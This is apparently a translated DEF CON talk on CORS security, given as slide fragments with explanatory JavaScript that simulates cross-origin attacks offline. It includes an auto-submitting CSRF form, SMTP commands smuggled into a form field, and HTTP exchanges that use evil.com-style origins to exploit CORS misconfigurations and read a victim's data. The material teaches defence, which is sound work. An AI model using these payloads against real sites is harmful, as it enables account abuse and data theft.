Teacher Duan, after finishing the translation of the slides to be used at DEF CON this morning I am very excited and really moved. Thank you very much for giving me the opportunity to take part in such an interesting event. I gained a lot from the day that has just ended; after talking with the overseas speakers I suddenly realised that they really do these things purely out of interest, because they love it. My first speaker, Zoz, a CS PhD from MIT, has spoken at nine consecutive DEF CONs, from DEF CON 16 to 24, and is a prank lover; every time he comes up with wild ideas, which is great fun, diss. MURS. Technology has no borders; being able to talk about the same technology with people of different languages, countries and skin colours made me realise that communication can also be very
<html>
<body>
<form method="post" action="http://b.com/b.php">
<input type="text" name="x" value="data">
<input type="submit" value="submit" />
</form>

<script type="text/javascript">
window.onload = function() {
  document.forms[0].submit();
}
</script>
</body>
</html>


Document of a.com

Cross site request forgery (CSRF)

Attacker site -> bank site
3. send cross site request

POST /transfer-money?to=attacker-account HTTP/1.1
Host: bank.com
Cookie: session-id=victim-cookie
HTML form protocol attack (HFPA)

Victim -> attacker site -> SMTP server

HELO example.com                     3. ignore unknown cmds
MAIL FROM:<somebody@example.com>     perform SMTP cmds
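The exchange behind the HFPA slide, as an added example that is not part of the original deck: the raw bytes a browser emits for a text/plain form post, fed to a small model of a lenient SMTP command loop that ignores anything it does not understand. The hostnames, addresses and message text are constructed for illustration; nothing is sent on the network.

```javascript
// Added example, not code from the original slides: what a lenient SMTP server
// sees when a browser is tricked into POSTing an HTML form at it (HFPA).
// With enctype="text/plain" the body is "name=value\r\n" lines, so an attacker
// can put raw SMTP commands into a field value. Hostnames, addresses and the
// message text are constructed for illustration.

// Raw request a browser would emit for a text/plain form post (constructed;
// real browsers add more headers, which the SMTP server ignores just the same).
function buildFormPost(host, fields) {
  const body = Object.entries(fields)
    .map(([name, value]) => name + "=" + value + "\r\n")
    .join("");
  return "POST / HTTP/1.1\r\n" +
         "Host: " + host + "\r\n" +
         "Content-Type: text/plain\r\n" +
         "Content-Length: " + Buffer.byteLength(body) + "\r\n" +
         "\r\n" + body;
}

// Model of a lenient SMTP server's command loop: unknown lines get a
// "500 unknown command" reply and the loop carries on, so the HTTP request
// line and headers are skipped and the SMTP commands in the body are executed.
function lenientSmtpServer(rawInput) {
  const log = [];      // replies, in order
  const executed = []; // commands the server acted on
  let inData = false;
  const dataLines = [];
  for (const line of rawInput.split("\r\n")) {
    if (inData) {
      if (line === ".") {
        inData = false;
        executed.push("DATA:" + dataLines.join("\n"));
        log.push("250 OK: queued");
      } else {
        dataLines.push(line);
      }
      continue;
    }
    const verb = line.split(/[ :]/)[0].toUpperCase();
    switch (verb) {
      case "HELO": case "EHLO":
        executed.push(line); log.push("250 smtp.example.com"); break;
      case "MAIL": case "RCPT":
        executed.push(line); log.push("250 OK"); break;
      case "DATA":
        inData = true; log.push("354 End data with <CR><LF>.<CR><LF>"); break;
      case "QUIT":
        executed.push(line); log.push("221 Bye"); return { log, executed };
      case "":
        break; // blank line between HTTP headers and body
      default:
        log.push("500 unknown command"); // "POST / HTTP/1.1", "Host: ...", "x=" ...
    }
  }
  return { log, executed };
}

// The attacker's form: one field whose value carries a whole SMTP session.
function runHfpaDemo() {
  const request = buildFormPost("smtp.example.com:25", {
    x: "\r\nHELO example.com\r\n" +
       "MAIL FROM:<somebody@example.com>\r\n" +
       "RCPT TO:<victim@example.net>\r\n" +
       "DATA\r\n" +
       "Subject: sent by your browser\r\n\r\nhello\r\n" +
       ".\r\n" +
       "QUIT",
  });
  return lenientSmtpServer(request);
}

console.log(runHfpaDemo().executed);
```

The five lines of HTTP framing each draw a "500 unknown command" and are otherwise harmless; everything after the first "x=" line is a normal SMTP session from the server's point of view, sent with the victim's source IP. This is why current browsers refuse to connect to port 25 and other well-known non-HTTP ports at all.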
var xhr = new XMLHttpRequest();
xhr.open("PATCH", "http://b.com/r", true);
xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xhr.withCredentials = true;
xhr.send("some data");
* Content-Type limited to "text/plain", "multipart/form-data" and "application/x-www-form-urlencoded" for a request to be sent without a preflight
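An added example, not from the original slides, of the rule the two slides above rely on: which cross-origin requests the browser sends directly (with cookies when withCredentials is set) and which first need an OPTIONS preflight. The checks follow the CORS-safelisted method and header rules of the WHATWG Fetch standard; the requests classified at the bottom are constructed, and the per-byte value restrictions on Accept and the language headers are not modelled.

```javascript
// Added example, not code from the original slides: classify a cross-origin
// request as a CORS "simple" request (sent straight away) or one that needs
// an OPTIONS preflight, using the CORS-safelisted rules of the Fetch standard.
// The requests checked at the bottom are constructed.

const SAFELISTED_METHODS = new Set(["GET", "HEAD", "POST"]);
const SAFELISTED_HEADERS = new Set([
  "accept", "accept-language", "content-language", "content-type",
]);
const SAFELISTED_CONTENT_TYPES = new Set([
  "application/x-www-form-urlencoded", "multipart/form-data", "text/plain",
]);

// headers: plain object of header name -> value, as given to setRequestHeader.
// Returns { simple, reason } so the caller can see which rule tripped.
function classifyCorsRequest(method, headers) {
  if (!SAFELISTED_METHODS.has(method.toUpperCase())) {
    return { simple: false, reason: "method " + method + " is not GET/HEAD/POST" };
  }
  for (const [name, value] of Object.entries(headers)) {
    const lname = name.toLowerCase();
    if (!SAFELISTED_HEADERS.has(lname)) {
      return { simple: false, reason: "header " + name + " is not CORS-safelisted" };
    }
    if (lname === "content-type") {
      // Only the MIME type is checked (parameters such as charset are allowed);
      // the Fetch standard also caps the whole value at 128 bytes.
      const mime = value.split(";")[0].trim().toLowerCase();
      if (!SAFELISTED_CONTENT_TYPES.has(mime) || value.length > 128) {
        return { simple: false, reason: "Content-Type " + value + " triggers a preflight" };
      }
    }
  }
  return { simple: true, reason: "CORS-safelisted method and headers" };
}

// The XHR on the slide: PATCH plus a custom X-Requested-With header, so the
// browser sends an OPTIONS preflight and the PATCH only follows if the server
// answers it with matching Access-Control-Allow-* headers.
const slideRequest = classifyCorsRequest("PATCH", { "X-Requested-With": "XMLHttpRequest" });

// What an attacker page can send with no preflight at all: a POST with a
// form-style Content-Type, exactly what an HTML form submission produces.
// With withCredentials = true the victim's cookies travel with it, which is
// why "we use a custom Content-Type" is no CSRF defence for these three types.
const formLikeRequest = classifyCorsRequest("POST", { "Content-Type": "text/plain" });

// A JSON body is not safelisted, so a cross-origin fetch() of JSON preflights.
const jsonRequest = classifyCorsRequest("POST", { "Content-Type": "application/json" });

console.log(slideRequest, formLikeRequest, jsonRequest);
```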
To: whucjj@icloud.com

Hello Jianjun,

Thank you for letting us know about your plans to present at DEF CON China. Your current timeline does not provide sufficient time to prepare security updates for our customers before your presentation.

To avoid putting our customers at risk, are you able to refrain from presenting
Inject iframes into any HTTP site
Hijack http://example.com and inject malicious JS
Malicious JS sends CORS request to HTTPS sites
  Origin: http://example.com
Server returns CORS policy
  Access-Control-Allow-Origin: http://example.com
Malicious JS sends secrets to attackers
* James Kettle, "Exploiting CORS misconfigurations for Bitcoins and bounties", AppSecUSA 2016
* Evan Johnson, "Misconfigured CORS and why web appsec is not getting easier", AppSecUSA 2016
images.baidu.com:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://m.baidu.com,https://www.baidu.com,
(a comma-separated list of origins, which no browser accepts: the header may carry only a single origin, null or *)
Origin: http://evil.com

HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://evil.com
Access-Control-Allow-Credentials: true
add header "Access-Control-Allow-Origin"

GET /api HTTP/1.1
Host: www.example.com
Origin: http://example.com.evil.com

HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://example.com.evil.com
Access-Control-Allow-Credentials: true
if (reqOrigin.endswith("example.com")) {
    respHeaders["Access-Control-Allow-Origin"] = reqOrigin
}

GET /api HTTP/1.1
Host: www.example.com
Origin: http://attackexample.com

HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://attackexample.com
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: single origin, null or *

"Whenever a user agent issues an HTTP request from a "privacy-sensitive" context, the user agent MUST send the value "null" in the Origin header field." (RFC 6454)
<iframe sandbox="allow-scripts allow-top-navigation allow-forms"
        src="data:text/html,<script>XMLHttpRequest

(a sandboxed iframe without allow-same-origin runs with an opaque origin, so the request its script sends carries Origin: null)
Hacking Facebook Messenger to Read Private Chats (BugSec / Cynet, "Originull")

Screenshot: the Facebook chat server's response to the attacker's page, with the headers
Cache-Control: private, no-store, no-cache
Pragma: no-cache
Content-Type: application/json
Date: Thu, 1 Dec 2016
Access-Control-Allow-Origin: (obscured in the screenshot)
Access-Control-Allow-Credentials: true
Connection: close
Content-Length: 494
followed by the JSON message stream ("class": "NewMessage", "type": "delta") and a demo page on www.bugsec.com displaying the hijacked private chat.

https://www.cynet.com/wp-content/uploads/2016/12/Blog-Post-BugSec-Cynet-Facebook-Originull.pdf
CORS framework                   Language   Check fail
ASP.net CORS                     ASP.net    Yes
Corsslim                         PHP
Django-cors-headers              Python     Yes
Flask-cors                       Python     Yes
Go-cors                          Golang     Yes
Laravel-cors                     PHP        Yes
NelmioCorsBundle                 PHP
Plack::Middleware::CrossOrigin   Perl       Yes
Rack-cors                        Ruby
Tomcat CORS filter               Java       Yes
Yii2 CORS filter                 PHP        Yes
GET /api HTTP/1.1
Host: www.example.com
Origin: null

HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
* Extract 97,199,966 subdomains from PassiveDNS
* From Qihoo 360 network security lab
* Method: actively probing CORS configurations

GET /api HTTP/1.1
Host: www.example.com
Origin: http://RAND.example.com

HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://RAND.example.com
Access-Control-Allow-Credentials: true
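An added example that is not part of the original slides, covering the origin checks shown above as misconfigurations (reflecting any Origin, the endswith("example.com") suffix check, answering Origin: null, trusting the HTTP version of the site's own origin) next to a strict allow-list, together with the probe the scanning slide describes: send a made-up origin and see whether it comes back in Access-Control-Allow-Origin with Allow-Credentials: true. The domains, the RAND label and the policy functions are constructed for illustration; no network traffic is sent.

```javascript
// Added example, not code from the original slides: server-side origin
// policies (three shaped like the misconfigurations on the slides, one strict)
// and a probe that asks each one which attacker origins it would grant a
// credentialed cross-origin read to. Domains, paths and the "RAND" label are
// constructed; nothing is sent on the network.

// Each policy maps the request's Origin header to the CORS response headers
// the server would add. Returning {} means "no CORS headers at all".
const policies = {
  // Slide: "add header Access-Control-Allow-Origin" with whatever was sent.
  reflectAny(origin) {
    return { "Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true" };
  },
  // Slide: if (reqOrigin.endswith("example.com")) ... so attackexample.com passes.
  suffixMatch(origin) {
    if (origin.endsWith("example.com")) {
      return { "Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true" };
    }
    return {};
  },
  // Slide: "Origin: null" answered with "Access-Control-Allow-Origin: null".
  // Every sandboxed iframe and data: URL has the null origin, so this is as
  // open as reflecting everything.
  allowNull(origin) {
    const trusted = new Set(["https://www.example.com", "null"]);
    return trusted.has(origin)
      ? { "Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true" }
      : {};
  },
  // Hardened: exact match of scheme + host + port against a fixed list that
  // contains neither "null" nor "*", no headers at all for unknown origins,
  // and Vary: Origin so a shared cache never serves one origin's answer to another.
  strictAllowList(origin) {
    const allowed = new Set(["https://www.example.com", "https://m.example.com"]);
    return allowed.has(origin)
      ? { "Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true", "Vary": "Origin" }
      : {};
  },
};

// Browser-side rule: a credentialed cross-origin read succeeds only when
// Allow-Origin equals the request origin exactly and Allow-Credentials is
// "true". "*" is never accepted together with credentials.
function credentialedReadAllowed(origin, headers) {
  return headers["Access-Control-Allow-Origin"] === origin &&
         headers["Access-Control-Allow-Credentials"] === "true";
}

// The probe from the scanning slide, generalised to several attacker origins.
// Returns the origins the policy would grant a credentialed read to although
// none of them is the site's own HTTPS origin.
function probe(policy) {
  const attackerOrigins = [
    "http://RAND.example.com",     // random sub-domain, as on the slide
    "http://evil.com",             // arbitrary origin
    "http://example.com.evil.com", // prefix-matching trick
    "http://attackexample.com",    // suffix-matching trick
    "http://www.example.com",      // HTTP downgrade of the real origin
    "null",                        // sandboxed iframe / data: URL
  ];
  return attackerOrigins.filter(o => credentialedReadAllowed(o, policy(o)));
}

for (const name of Object.keys(policies)) {
  console.log(name, "accepts:", probe(policies[name]));
}
```

Against a real target the probe is the same request with a made-up Origin; the finding is not the 200 OK but the pair of headers echoing that origin with Allow-Credentials: true, which is what the PassiveDNS-scale scan on the slide looks for.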


Cross origin resource sharing (CORS)

Timeline, 1991 to 2018:
HTML proposed
JS and SOP introduced
CSRF vulnerability discovered
US-CERT vulnerability note on HFPA attacks
JSONP proposed
First CORS draft submitted
JSONP vulnerability discovered
CORS shipped by IE, Chrome, Firefox, Safari
CORS accepted as W3C recommendation
CORS included in WHATWG's Fetch standard
W3C CORS proposed obsolete